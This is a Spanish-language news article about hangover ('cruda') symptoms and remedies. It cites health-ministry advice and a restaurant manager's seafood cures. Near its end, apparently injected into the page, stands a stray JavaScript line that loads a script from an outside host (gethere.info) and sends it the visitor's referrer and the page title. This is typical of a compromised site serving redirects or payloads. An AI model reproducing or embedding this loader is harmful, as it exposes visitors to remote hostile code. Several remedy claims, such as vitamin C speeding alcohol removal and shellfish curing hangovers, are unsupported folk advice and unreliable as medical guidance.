¿Tienes Cruda? Te presentamos estos remedios para aliviarte

Dolor de cabeza, nauseas y acidez estomacal son algunos síntomas; se recomienda beber agua y consumir vitamina C
Después de la cena de Navidad, la llamada resaca suele hacer su aparición con dolor de cabeza, fatiga, sed intensa, ardor y acidez estomacal, visión borrosa, temblores, diarrea, mareos, náuseas y hasta vómito.

De acuerdo con la Secretaría de Salud (SSA), la gente con resaca muestra una disminución del rendimiento laboral, de capacidad cognitiva y de las habilidades visuales-espaciales, esto por los procesos metabólicos del hígado, los efectos diuréticos del alcohol y la baja del azúcar en la sangre.

También refiere que el dolor de cabeza, usual en todas las personas que sufren este padecimiento, es resultado de la dilatación de los vasos sanguíneos.

A fin de evitar las molestias, la dependencia recomienda tomar de forma moderada, nunca ingerir alcohol con el estómago vacío, beber a un ritmo tal que el organismo pueda eliminar el alcohol y comer, porque ello ayudará a retardar la absorción del mismo.

Aunque la capacidad de asimilación del alcohol depende del organismo de cada persona, se estima que un consumo responsable es beber una copa por cada hora de diversión y no bajar de 45 minutos en cada intervalo.

Pero si ya existe este mal, aquí te dejamos unos consejos que puedes aplicar para sentirte mejor:

Entre las recetas destacan el jugo de fruta que tienen vitamina C. La combinación de ambas favorece al cuerpo a expulsar más rápido el alcohol en la sangre.

De acuerdo con el gerente del restaurante sinaloense La Bichola, el jugo de tomate frío mezclado con almejas o camarones es efectivo para curar la resaca, ya que su alto contenido de potasio, magnesio y fósforo, son esenciales para el funcionamiento normal de los músculos y su coordinación motora.

Durante la resaca se recomienda evitar alimentos grasosos, pues el estómago se encuentra en mal estado. En este caso, el callo de hacha o camarones en “aguachile” con mucho limón, son una solución ideal.

Otro remedio es beber suficiente agua para rehidratar, además de refrescar órganos y células que fueron perjudicadas por la fiesta con alto consumo de alcohol, sin embargo, se sugiere evitar tomar café, puesto que se caracteriza como potente diurético.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado